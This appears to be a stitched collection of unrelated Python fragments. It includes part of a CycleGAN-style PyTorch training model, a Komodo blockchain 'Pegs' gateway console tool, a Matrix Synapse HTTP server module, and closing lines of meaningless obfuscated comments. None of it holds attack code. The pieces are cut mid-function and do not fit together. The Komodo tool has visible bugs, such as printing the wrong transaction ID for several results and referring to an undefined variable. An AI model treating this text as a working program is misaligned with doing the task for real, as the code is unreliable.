self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers.append(self.optimizer_G)
self.optimizers.append(self.optimizer_D)
# def entropy_loss(v):
# """
# Entropy loss for probabilistic prediction vectors
# input: batch_size x channels x h x w
# output: batch_size x 1 x h x w
# """
# assert v.dim() == 4
# n, c, h, w = v.size()
# return -torch.sum(torch.mul(v, torch.log2(v + 1e-30))) / (n * h * w * np.log2(c))
# def prob_2_entropy(prob):
# """ convert probabilistic prediction maps to weighted self-information maps
# """
# n, c, h, w = prob.size()
# #entropy = -torch.mul(prob, torch.log2(prob + 1e-30)) / np.log2(c)
# entropy = -torch.mul(prob, torch.log2(prob + 1e-30)) / (n * h * w)
# return entropy
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): include the data itself and its metadata information.
The option 'direction' can be used to swap domain A and domain B.
"""
AtoB = self.opt.direction == 'AtoB'
self.real_A = input['A' if AtoB else 'B'].to(self.device)
self.real_B = input['B' if AtoB else 'A'].to(self.device)
self.image_paths = input['A_paths' if AtoB else 'B_paths']
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.fake_B, self.o1_b, self.o2_b, \
self.a1_b, self.a2_b, \
self.i1_b,\
self.fake_c_b= self.netG_A(self.real_A) # G_A(A)
self.rec_A, _, _, \
_, _, \
_,_= self.netG_B(self.fake_B) # G_B(G_A(A))
self.fake_A, self.o1_a, self.o2_a, \
self.a1_a, self.a2_a,\
self.i1_a,\
self.fake_c_a = self.netG_B(self.real_B) # G_B(B)
self.rec_B, _, _, \
_, _,\
_,_ = self.netG_A(self.fake_A) # G_A(G_B(B))
self.idt_A, _, _, \
self.idt_A_att1, self.idt_A_att2, \
self.idt_A_cont, _ = self.netG_A(self.real_B)
self.idt_B, _, _, \
self.idt_B_att1, self.idt_B_att2, \
self.idt_B_cont, _ = self.netG_B(self.real_A)
def backward_D_basic(self, netD, real, fake):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Real
pred_real = netD(real)
loss_D_real = self.criterionGAN(pred_real, True)
# Fake
pred_fake = netD(fake.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# Combined loss and calculate gradients
loss_D = (loss_D_real + loss_D_fake) * 0.5
loss_D.backward()
return loss_D
def backward_D_basicA(self, netD, real_a, real_b, fake_a, fake_b):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Reala
pred_real_a = netD(real_a)
loss_D_real_a = self.criterionGAN(pred_real_a, 0)
# Real
pred_real_b = netD(real_b)
loss_D_real_b = self.criterionGAN(pred_real_b, 1)
# Fake
pred_fake_a = netD(fake_a.detach())
loss_D_fake_a = self.criterionGAN(pred_fake_a, 2)
# Fake
pred_fake_b = netD(fake_b.detach())
loss_D_fake_b = self.criterionGAN(pred_fake_b, 3)
# Combined loss and calculate gradients
loss_D = (loss_D_real_a + loss_D_real_b + loss_D_fake_a + loss_D_fake_b)
loss_D.backward()
return loss_D
def backward_D_basicB(self, netD, real, fake):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Real
pred_real = netD(real)
loss_D_real = self.criterionGAN(pred_real, 0)
# Fake
pred_fake = netD(fake.detach())
loss_D_fake = self.criterionGAN(pred_fake, 2)
# Combined loss and calculate gradients
loss_D = (loss_D_real + loss_D_fake) * 0.5
loss_D.backward()
return loss_D
def backward_D_A(self):
"""Calculate GAN loss for discriminator D_A"""
fake_B = self.fake_B_pool.query(self.fake_B)
fake_A = self.fake_A_pool.query(self.fake_A)
self.loss_D_A = self.backward_D_basicA(self.netD_A, self.real_A, self.real_B, fake_A, fake_B)
def backward_D_content_A(self):
fake_C_B = self.fake_C_B_pool.query(self.fake_c_b)
real_C_B = self.real_C_B_pool.query(self.o2_b)
self.loss_D_content_A = self.backward_D_basic(self.netD_content_A, real_C_B, fake_C_B)
def backward_D_content_B(self):
fake_C_A = self.fake_C_A_pool.query(self.fake_c_a)
real_C_A = self.real_C_A_pool.query(self.o2_a)
self.loss_D_content_B = self.backward_D_basic(self.netD_content_B, real_C_A, fake_C_A)
def backward_G(self):
"""Calculate the loss for generators G_A and G_B"""
lambda_idt = self.opt.lambda_identity #0.5
lambda_A = self.opt.lambda_A #10
lambda_B = self.opt.lambda_B #10
ones = torch.ones(self.real_A.size()).cuda()
# Identity loss
if lambda_idt > 0:
# G_A should be identity if real_B is fed: ||G_A(B) - B||
self.idt_A, _, _, \
self.idt_A_att1, self.idt_A_att2, \
self.idt_A_cont,_ = self.netG_A(self.real_B)
self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt
# G_B should be identity if real_A is fed: ||G_B(A) - A||
self.idt_B, _, _, \
self.idt_B_att1, self.idt_B_att2, \
self.idt_B_cont,_ = self.netG_B(self.real_A)
self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt
else:
self.loss_idt_A = 0
self.loss_idt_B = 0
# GAN loss D_A(G_A(A))
self.loss_G_A = self.criterionGAN(self.netD_A(self.fake_B), 1)*4
# GAN loss D_B(G_B(B))
self.loss_G_B = self.criterionGAN(self.netD_A(self.fake_A), 0)*4
# Forward cycle loss || G_B(G_A(A)) - A||
self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A
# Backward cycle loss || G_A(G_B(B)) - B||
self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B
# combined loss and calculate gradients
self.loss_G = self.loss_G_A + self.loss_G_B + self.loss_cycle_A + self.loss_cycle_B + \
self.loss_idt_A + self.loss_idt_B
self.loss_G.backward()
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
# forward
self.forward() # compute fake images and reconstruction images.
# G_A and G_B
self.set_requires_grad([self.netD_A], False) # Ds require no gradients when optimizing Gs
self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero
self.backward_G() # calculate gradients for G_A and G_B
self.optimizer_G.step() # update | |
["+str(info['totalsupply'])+"]", 'green'))
print(colorize("Gateways Remaining Supply ["+str(info['remaining'])+"]", 'green'))
print(colorize("Gateways Issued Supply ["+str(info['issued'])+"]", 'green'))
input("Press [Enter] to continue...")
return gw_index
except Exception as e:
print(info)
print(e)
print("Something went wrong. Please check your input")
input("Press [Enter] to continue...")
def gateways_deposit_claim_tokens(rpc_connection_assetchain, rpc_connection_komodo):
selected_gateway = gateway_info_tui(rpc_connection_assetchain)
gateways_list = rpc_connection_assetchain.gatewayslist()
bind_txid = gateways_list[selected_gateway]
gw_info = rpc_connection_assetchain.gatewaysinfo(bind_txid)
gw_sendmany = gateways_send_kmd(rpc_connection_komodo, gw_info['deposit'])
gw_sendmany_txid = gw_sendmany[0]
gw_recipient_addr = gw_sendmany[1]
gw_deposit_amount = gw_sendmany[2]
deposit_info = gateways_deposit_tui(rpc_connection_assetchain, rpc_connection_komodo,
bind_txid, gw_info['coin'], gw_sendmany_txid, gw_deposit_amount,
gw_recipient_addr)
deposit_txid = deposit_info[0]
dest_pub = deposit_info[1]
claim_txid = gateways_claim_tui(rpc_connection_assetchain, bind_txid, gw_info['coin'],
deposit_txid, dest_pub, gw_deposit_amount)
tokenbalance = rpc_connection_assetchain.tokenbalance(gw_info['tokenid'])
print("Gateway transfer complete!")
print(colorize("Deposit TXID ["+str(bind_txid)+"]", 'green'))
print(colorize("Claim TXID ["+str(bind_txid)+"]", 'green'))
print(colorize("Token Balance ["+str(bind_txid)+"]", 'green'))
def pegs_fund_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
token_txid = select_tokenid(rpc_connection)
tokenbalance = rpc_connection.tokenbalance(token_txid)['balance']/100000000
amount = int(input("Set pegs funding amount ("+str(tokenbalance)+" available): "))
except KeyboardInterrupt:
break
else:
fund_hex = rpclib.pegs_fund(rpc_connection, pegs_txid, token_txid, amount)
print(fund_hex)
if fund_hex['result'] == "error":
print(colorize("\nSomething went wrong!\n", "magenta"))
print(fund_hex)
print("\n")
input("Press [Enter] to continue...")
break
else:
try:
pegsfund_txid = rpclib.sendrawtransaction(rpc_connection,
fund_hex['hex'])
except KeyError:
print(pegsfund_txid)
print("Error")
input("Press [Enter] to continue...")
break
finally:
print(colorize("Pegs Fund transaction broadcasted: " + pegsfund_txid, "green"))
input("Press [Enter] to continue...")
break
def pegs_get_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
token_txid = select_tokenid(rpc_connection)
info = rpc_connection.pegsaccountinfo(pegs_txid)
if info['result'] == "success":
if len(info['account info']) > 0:
for item in info['account info']:
print("Token: "+item['token'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("Ratio "+item['ratio'])
else:
print("Something went wrong.")
print(info)
input("Press [Enter] to continue...")
break
amount = input("Set pegs get amount: ")
except KeyboardInterrupt:
break
else:
pegsget_hex = rpclib.pegs_get(rpc_connection, pegs_txid, token_txid, amount)
if pegsget_hex['result'] == "error":
print(colorize("\nSomething went wrong!\n", "magenta"))
print(pegsget_hex)
print("\n")
input("Press [Enter] to continue...")
break
else:
try:
pegsget_txid = rpclib.sendrawtransaction(rpc_connection,
pegsget_hex['hex'])
except KeyError:
print(pegsget_hex)
print("Error")
input("Press [Enter] to continue...")
break
finally:
print(colorize("Pegs Get transaction broadcasted: " +pegsget_txid, "green"))
input("Press [Enter] to continue...")
break
# pegs_txid = 5ccdff0d29f2f47fb1e349c1ff9ae17977a58763abacf693cd27e98b38fad3f3
def pegsinfo_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
info = rpc_connection.pegsinfo(pegs_txid)
if info['result'] == "success":
if len(info['info']) > 0:
for item in info['info']:
print("Token: "+item['token'])
print("Total deposit: "+str(item['total deposit']))
print("Total debt: "+str(item['total debt']))
print("Ratio : "+str(item['total ratio']))
print("Global ratio: "+info['global ratio'])
else:
print("Something went wrong.")
print(info)
input("Press [Enter] to continue...")
break
except KeyError:
print(info)
print("Error")
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_accounthistory_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
history = rpc_connection.pegsaccounthistory(pegs_txid)
if history['result'] == "success":
if len(history['account history']) > 0:
for item in history['account history']:
print("-----------------------")
print("Action: "+item['action'])
print("Amount: "+str(item['amount']))
print("Account TXID: "+item['accounttxid'])
print("Token: "+item['token'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("-----------------------")
#[{'action': 'fund', 'amount': 100000000, 'accounttxid': '1e9409af6e391f996de434a3f86d765df43251d61cc1e720fa9a6457078d0f61', 'token': 'KMD', 'deposit': 100000000, 'debt': 0}, {'action': 'get', 'amount': 50000000, 'accounttxid': '<KEY>', 'token': '<PASSWORD>', 'deposit': 100000000, 'debt': 50000000}]}
except KeyError:
print(history)
print("Key Error: "+str(KeyError))
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_accountinfo_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
info = rpc_connection.pegsaccountinfo(pegs_txid)
if info['result'] == "success":
if len(info['account info']) > 0:
for item in info['account info']:
print("Token: "+item['token'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("Ratio "+item['ratio'])
else:
print("Something went wrong.")
print(info)
input("Press [Enter] to continue...")
break
except KeyError:
print(info)
print("Error")
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_addresses_tui(rpc_connection):
while True:
try:
address = rpc_connection.pegsaddress()
if address['result'] == "success":
print("PegsCCAddress: "+address['PegsCCAddress'])
print("PegsCCBalance: "+str(address['PegsCCBalance']))
print("PegsNormalAddress: "+address['PegsNormalAddress'])
print("PegsNormalBalance: "+address['PegsNormalBalance'])
print("PegsCCTokensAddress: "+address['PegsCCTokensAddress'])
print("myCCAddress(Pegs): "+address['myCCAddress(Pegs)'])
print("myCCbalance(Pegs): "+str(address['myCCbalance(Pegs)']))
print("myaddress: "+address['myaddress'])
print("mybalance: "+str(address['mybalance']))
else:
print("Something went wrong.")
print(address)
input("Press [Enter] to continue...")
break
except KeyError:
print(address)
print("Error")
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_worstaccounts_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
worst = rpc_connection.pegsworstaccounts(pegs_txid)
if worst['result'] == "success":
if 'KMD' in worst:
if len(worst['KMD']) > 0:
for item in worst['KMD']:
print("Account TXID: "+item['accounttxid'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("Ratio "+item['ratio'])
else:
print("No accounts at risk of liquidation at the moment.")
info = rpc_connection.pegsinfo(pegs_txid)
if info['result'] == "success":
if len(info['info']) > 0:
for item in info['info']:
print("Token: "+item['token'])
print("Total deposit: "+str(item['total deposit']))
print("Total debt: "+str(item['total debt']))
print("Ratio : "+str(item['total ratio']))
print("Global ratio: "+info['global ratio'])
except KeyError:
print(worst)
print("Key Error: "+str(KeyError))
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_create_tui():
paramlist = ["-ac_supply=5000", "-ac_reward=800000000",
"-ac_sapling=1", "-addnode=localhost", "-ac_snapshot=1440",
"-ac_cc=2", "-ac_import=PEGSCC", "-debug=gatewayscc-2",
"-ac_end=1", "-ac_perc=0", "-ac_cbopret=7"
]
while True:
kmd_path = input("Input komodod path (e.g. /home/user/komodo/src): ")
if not os.path.isfile(kmd_path+'/komodod'):
print("komodod not found in "+kmd_path+"! Try again.")
else:
break
# check if komodod exists in path
coin = input("Enter name of Pegs chain to create: ")
#check for bad chars
external_coin = input("Enter ticker of external coin to Peg (e.g. KMD): ")
#check for bad chars
token_supply = input("How many tokens to create?: ")
paramlist.append("-ac_name="+coin)
# launch chains, get rpcs
rpcs = spawn_chain_pair(coin, kmd_path, paramlist)
primary_rpc = rpcs[0]
secondary_rpc = rpcs[1]
secondary_rpc.setgenerate(True, 1)
# get address, wif and pubkeys
primary_addr = primary_rpc.getnewaddress()
primary_wif = primary_rpc.dumpprivkey(primary_addr)
primary_pubkey = primary_rpc.validateaddress(primary_addr)['pubkey']
primary_rpc.setpubkey(primary_pubkey)
# selfsend to avoid coinbase errors
balance = primary_rpc.getbalance()
selfsend_txid = primary_rpc.sendtoaddress(primary_addr, int(balance)/2)
check_if_tx_in_mempool(primary_rpc, selfsend_txid)
token_txid = token_create_tui(primary_rpc, external_coin, token_supply, external_coin+"_tether")
oracle_txid = oracle_create_tui(primary_rpc, external_coin, external_coin+"_tether", 'IhhL')
oracle_register_tui(primary_rpc, oracle_txid, '0.001')
oracle_subscription_utxogen(primary_rpc, oracle_txid, primary_pubkey, '50', 10)
tokensupply = str(primary_rpc.tokeninfo(token_txid)['supply'])
bind_txid = gateways_bind_tui(primary_rpc, token_txid, tokensupply, oracle_txid, external_coin)
oraclefeed_launch_str = spawn_oraclefeed(coin, kmd_path, oracle_txid, primary_pubkey, bind_txid)
# Create the Peg
pegs_funding = input("Enter amount of Pegs funding (e.g. 100): ")
num_binds = 1
resp = primary_rpc.pegscreate(str(pegs_funding), str(num_binds), bind_txid)
print(resp)
if 'hex' in resp:
pegs_txid = primary_rpc.sendrawtransaction(resp['hex'])
check_if_tx_in_mempool(primary_rpc, pegs_txid)
print(colorize("Pegs TXID ["+str(pegs_txid)+"]", 'green'))
paramlist.append("-earlytxid="+pegs_txid)
print(colorize("The Pegs Contract has been created successfully!", 'green'))
info = primary_rpc.gatewaysinfo(bind_txid)
with open(cwd+"/"+coin+"_pegsinfo.json", "w+") as file:
file.write('{\n"Pegs_Launch_Parameters":"'+" ".join(paramlist)+'",\n')
file.write('"Oraclefeed_Launch_Parameters":"'+oraclefeed_launch_str+'",\n')
file.write('"Pegs_Creation_TXID":"'+str(pegs_txid)+'",\n')
file.write('"Gateways_Bind_TXID":"'+str(bind_txid)+'",\n')
file.write('"Oracle_TXID":"'+str(info['oracle_txid'])+'",\n')
file.write('"Token_TXID":"'+str(info['tokenid'])+'",\n')
file.write('"Coin":"'+str(info['coin'])+'",\n')
file.write('"Pubkeys":"'+str(info['pubkeys'])+'",\n')
file.write('"Gateways_Deposit_Address":"'+str(info['deposit'])+'"\n}')
print("Pegs Launch Parameters: "+' '.join(paramlist))
print("Pegs Creation TXID ["+str(bind_txid)+"]")
print("Gateways Bind TXID ["+str(bind_txid)+"]")
print("Oracle TXID ["+str(info['oracle_txid'])+"]")
print("Token TXID ["+str(info['tokenid'])+"]")
print("Coin ["+str(info['coin'])+"]")
print("Pubkeys ["+str(info['pubkeys'])+"]")
print("Gateways Deposit Address ["+str(info['deposit'])+"]")
print(colorize("Details have been written to "+coin+"_pegsinfo.json", 'blue'))
input("Press [Enter] to continue...")
return pegs_txid
else:
print(colorize("Pegs TXID failed! ["+str(result)+"]", 'red'))
input("Press [Enter] to continue...")
return 'back to menu'
def spawn_oraclefeed(dest_chain, kmd_path, oracle_txid, pubkey, bind_txid):
oraclefeed_build_log = str(dest_chain)+"_oraclefeed_build.log"
oraclefeed_build = open(oraclefeed_build_log,'w+')
print("Building oraclefeed ")
subprocess.Popen(["gcc", kmd_path+"/cc/dapps/oraclefeed.c", "-lm", "-o", kmd_path+"/oraclefeed"], stdout=oraclefeed_build, stderr=oraclefeed_build, universal_newlines=True)
oraclefeed_log = str(dest_chain)+"_oraclefeed.log"
oraclefeed_output = open(oraclefeed_log,'w+')
print("running oraclefeed ")
subprocess.Popen([kmd_path+"/oraclefeed", dest_chain, oracle_txid, pubkey, "IhhL", bind_txid, kmd_path+"/komodo-cli"], stdout=oraclefeed_output, stderr=oraclefeed_output, universal_newlines=True)
print(" Use tail -f "+kmd_path+"/"+oraclefeed_log+" for oraclefeed log console messages")
print(colorize("IMPORTANT: The oraclefeed must be running at all times for the Pegs contract to work!", "red"))
oraclefeed_launch_str = str(kmd_path+"/oraclefeed "+dest_chain+" "+oracle_txid+" "+pubkey+" IhhL "+bind_txid+" "+kmd_path+"/komodo-cli")
print(colorize("Launch it with "+oraclefeed_launch_str, "blue"))
input("Press [Enter] to continue...")
return oraclefeed_launch_str
def oraclefeed_tui(jsonfile=''):
if jsonfile == '':
choice = input("select json file from list? (y/n)")
if choice == 'y' or choice == 'Y':
jsonfile = select_file(cwd, 'json')
if jsonfile == '':
while True:
try:
dest_chain = input('Enter name of Pegs chain')
rpc = rpclib.def_credentials(dest_chain)
except:
print(colorize(dest_chain+" conf file does not exist! Try again.", "red"))
break
while True:
kmd_path = input("Input komodod path (e.g. /home/user/komodo/src): ")
if not os.path.isfile(kmd_path+'/komodod'):
print("komodod not found in "+kmd_path+"! Try again.")
else:
break
oracle_txid = select_oracle_txid(rpc)
pubkey = rpc.getinfo()['pubkey']
bind_txid = select_gateway(rpc)
else:
try:
with open(jsonfile, 'r') as f:
oraclefeed_json = json.loads(f.read())
oraclefeed_params = oraclefeed_json['Oraclefeed_Launch_Parameters'].split(" ")
kmd_path = oraclefeed_params[0].replace("oraclefeed","")
dest_chain = oraclefeed_params[1]
oracle_txid = oraclefeed_params[2]
pubkey = oraclefeed_params[3]
bind_txid = oraclefeed_params[5]
except Exception as e:
print("Something wrong with json file.")
print(e)
spawn_oraclefeed(dest_chain, kmd_path, oracle_txid, pubkey, bind_txid)
def get_commit_hash(repo_path):
os.chdir(repo_path)
proc = subprocess.run(['git', 'log', '-n', '1'], check=True, stdout=subprocess.PIPE, universal_newlines=True)
output = proc.stdout
return output.split()[1]
def launch_chain(coin, kmd_path, params, pubkey=''):
if pubkey != '':
params.append("-pubkey="+pubkey)
print(params)
commit = get_commit_hash(kmd_path)
test_log = coin+"_"+commit+".log"
test_output = open(test_log,'w+')
print("Launching "+coin+" daemon")
print(colorize("Launch Params: ["+str(' '.join([kmd_path+"/komodod"]+params))+"]", "green"))
subprocess.Popen([kmd_path+"/komodod"]+params, stdout=test_output, stderr=test_output, universal_newlines=True)
print(" Use `tail -f "+kmd_path+"/"+test_log+"` for "+coin+" console messages")
loop = 0
started = 0
print("Waiting for "+coin+" to start...")
while started == 0:
time.sleep(30)
print("Waiting for "+coin+" to start...")
loop += 1
try:
pegs_rpc = rpclib.def_credentials(coin)
coin_info = pegs_rpc.getinfo()
print(coin_info)
started = 1
break
except:
print("Waiting for "+coin+" to start...")
pass
if started == 1:
break
if loop > 10:
print("Something went wrong. Check "+test_log)
break
def spawn_chain_pair(coin, kmd_path, paramlist):
secondary_params = paramlist[:]
launch_chain(coin, | |
<gh_stars>0
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import html
import logging
import types
import urllib
from http import HTTPStatus
from io import BytesIO
from typing import Awaitable, Callable, TypeVar, Union
import jinja2
from canonicaljson import encode_canonical_json, encode_pretty_printed_json, json
from twisted.internet import defer
from twisted.python import failure
from twisted.web import resource
from twisted.web.server import NOT_DONE_YET, Request
from twisted.web.static import NoRangeStaticProducer
from twisted.web.util import redirectTo
import synapse.events
import synapse.metrics
from synapse.api.errors import (
CodeMessageException,
Codes,
RedirectException,
SynapseError,
UnrecognizedRequestError,
)
from synapse.http.site import SynapseRequest
from synapse.logging.context import preserve_fn
from synapse.logging.opentracing import trace_servlet
from synapse.util.caches import intern_dict
logger = logging.getLogger(__name__)
HTML_ERROR_TEMPLATE = """<!DOCTYPE html>
<html lang=en>
<head>
<meta charset="utf-8">
<title>Error {code}</title>
</head>
<body>
<p>{msg}</p>
</body>
</html>
"""
def wrap_json_request_handler(h):
"""Wraps a request handler method with exception handling.
Also does the wrapping with request.processing as per wrap_async_request_handler.
The handler method must have a signature of "handle_foo(self, request)",
where "request" must be a SynapseRequest.
The handler must return a deferred or a coroutine. If the deferred succeeds
we assume that a response has been sent. If the deferred fails with a SynapseError we use
it to send a JSON response with the appropriate HTTP reponse code. If the
deferred fails with any other type of error we send a 500 reponse.
"""
async def wrapped_request_handler(self, request):
try:
await h(self, request)
except SynapseError as e:
code = e.code
logger.info("%s SynapseError: %s - %s", request, code, e.msg)
# Only respond with an error response if we haven't already started
# writing, otherwise lets just kill the connection
if request.startedWriting:
if request.transport:
try:
request.transport.abortConnection()
except Exception:
# abortConnection throws if the connection is already closed
pass
else:
respond_with_json(
request,
code,
e.error_dict(),
send_cors=True,
pretty_print=_request_user_agent_is_curl(request),
)
except Exception:
# failure.Failure() fishes the original Failure out
# of our stack, and thus gives us a sensible stack
# trace.
f = failure.Failure()
logger.error(
"Failed handle request via %r: %r",
request.request_metrics.name,
request,
exc_info=(f.type, f.value, f.getTracebackObject()),
)
# Only respond with an error response if we haven't already started
# writing, otherwise lets just kill the connection
if request.startedWriting:
if request.transport:
try:
request.transport.abortConnection()
except Exception:
# abortConnection throws if the connection is already closed
pass
else:
respond_with_json(
request,
500,
{"error": "Internal server error", "errcode": Codes.UNKNOWN},
send_cors=True,
pretty_print=_request_user_agent_is_curl(request),
)
return wrap_async_request_handler(wrapped_request_handler)
TV = TypeVar("TV")
def wrap_html_request_handler(
h: Callable[[TV, SynapseRequest], Awaitable]
) -> Callable[[TV, SynapseRequest], Awaitable[None]]:
"""Wraps a request handler method with exception handling.
Also does the wrapping with request.processing as per wrap_async_request_handler.
The handler method must have a signature of "handle_foo(self, request)",
where "request" must be a SynapseRequest.
"""
async def wrapped_request_handler(self, request):
try:
await h(self, request)
except Exception:
f = failure.Failure()
return_html_error(f, request, HTML_ERROR_TEMPLATE)
return wrap_async_request_handler(wrapped_request_handler)
def return_html_error(
f: failure.Failure, request: Request, error_template: Union[str, jinja2.Template],
) -> None:
"""Sends an HTML error page corresponding to the given failure.
Handles RedirectException and other CodeMessageExceptions (such as SynapseError)
Args:
f: the error to report
request: the failing request
error_template: the HTML template. Can be either a string (with `{code}`,
`{msg}` placeholders), or a jinja2 template
"""
if f.check(CodeMessageException):
cme = f.value
code = cme.code
msg = cme.msg
if isinstance(cme, RedirectException):
logger.info("%s redirect to %s", request, cme.location)
request.setHeader(b"location", cme.location)
request.cookies.extend(cme.cookies)
elif isinstance(cme, SynapseError):
logger.info("%s SynapseError: %s - %s", request, code, msg)
else:
logger.error(
"Failed handle request %r",
request,
exc_info=(f.type, f.value, f.getTracebackObject()),
)
else:
code = HTTPStatus.INTERNAL_SERVER_ERROR
msg = "Internal server error"
logger.error(
"Failed handle request %r",
request,
exc_info=(f.type, f.value, f.getTracebackObject()),
)
if isinstance(error_template, str):
body = error_template.format(code=code, msg=html.escape(msg))
else:
body = error_template.render(code=code, msg=msg)
body_bytes = body.encode("utf-8")
request.setResponseCode(code)
request.setHeader(b"Content-Type", b"text/html; charset=utf-8")
request.setHeader(b"Content-Length", b"%i" % (len(body_bytes),))
request.write(body_bytes)
finish_request(request)
def wrap_async_request_handler(h):
"""Wraps an async request handler so that it calls request.processing.
This helps ensure that work done by the request handler after the request is completed
is correctly recorded against the request metrics/logs.
The handler method must have a signature of "handle_foo(self, request)",
where "request" must be a SynapseRequest.
The handler may return a deferred, in which case the completion of the request isn't
logged until the deferred completes.
"""
async def wrapped_async_request_handler(self, request):
with request.processing():
await h(self, request)
# we need to preserve_fn here, because the synchronous render method won't yield for
# us (obviously)
return preserve_fn(wrapped_async_request_handler)
class HttpServer(object):
""" Interface for registering callbacks on a HTTP server
"""
def register_paths(self, method, path_patterns, callback):
""" Register a callback that gets fired if we receive a http request
with the given method for a path that matches the given regex.
If the regex contains groups these gets passed to the calback via
an unpacked tuple.
Args:
method (str): The method to listen to.
path_patterns (list<SRE_Pattern>): The regex used to match requests.
callback (function): The function to fire if we receive a matched
request. The first argument will be the request object and
subsequent arguments will be any matched groups from the regex.
This should return a tuple of (code, response).
"""
pass
class JsonResource(HttpServer, resource.Resource):
""" This implements the HttpServer interface and provides JSON support for
Resources.
Register callbacks via register_paths()
Callbacks can return a tuple of status code and a dict in which case the
the dict will automatically be sent to the client as a JSON object.
The JsonResource is primarily intended for returning JSON, but callbacks
may send something other than JSON, they may do so by using the methods
on the request object and instead returning None.
"""
isLeaf = True
_PathEntry = collections.namedtuple(
"_PathEntry", ["pattern", "callback", "servlet_classname"]
)
def __init__(self, hs, canonical_json=True):
resource.Resource.__init__(self)
self.canonical_json = canonical_json
self.clock = hs.get_clock()
self.path_regexs = {}
self.hs = hs
def register_paths(
self, method, path_patterns, callback, servlet_classname, trace=True
):
"""
Registers a request handler against a regular expression. Later request URLs are
checked against these regular expressions in order to identify an appropriate
handler for that request.
Args:
method (str): GET, POST etc
path_patterns (Iterable[str]): A list of regular expressions to which
the request URLs are compared.
callback (function): The handler for the request. Usually a Servlet
servlet_classname (str): The name of the handler to be used in prometheus
and opentracing logs.
trace (bool): Whether we should start a span to trace the servlet.
"""
method = method.encode("utf-8") # method is bytes on py3
if trace:
# We don't extract the context from the servlet because we can't
# trust the sender
callback = trace_servlet(servlet_classname)(callback)
for path_pattern in path_patterns:
logger.debug("Registering for %s %s", method, path_pattern.pattern)
self.path_regexs.setdefault(method, []).append(
self._PathEntry(path_pattern, callback, servlet_classname)
)
def render(self, request):
""" This gets called by twisted every time someone sends us a request.
"""
defer.ensureDeferred(self._async_render(request))
return NOT_DONE_YET
@wrap_json_request_handler
async def _async_render(self, request):
""" This gets called from render() every time someone sends us a request.
This checks if anyone has registered a callback for that method and
path.
"""
callback, servlet_classname, group_dict = self._get_handler_for_request(request)
# Make sure we have a name for this handler in prometheus.
request.request_metrics.name = servlet_classname
# Now trigger the callback. If it returns a response, we send it
# here. If it throws an exception, that is handled by the wrapper
# installed by @request_handler.
kwargs = intern_dict(
{
name: urllib.parse.unquote(value) if value else value
for name, value in group_dict.items()
}
)
callback_return = callback(request, **kwargs)
# Is it synchronous? We'll allow this for now.
if isinstance(callback_return, (defer.Deferred, types.CoroutineType)):
callback_return = await callback_return
if callback_return is not None:
code, response = callback_return
self._send_response(request, code, response)
def _get_handler_for_request(self, request):
"""Finds a callback method to handle the given request
Args:
request (twisted.web.http.Request):
Returns:
Tuple[Callable, str, dict[unicode, unicode]]: callback method, the
label to use for that method in prometheus metrics, and the
dict mapping keys to | |
)
if 11 - 11: OoOoOO00 % OOooOOo . i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
if 28 - 28: OOooOOo . OoO0O00 / o0oOOo0O0Ooo + II111iiii / iIii1I11I1II1 * II111iiii
if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
if 47 - 47: II111iiii
if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
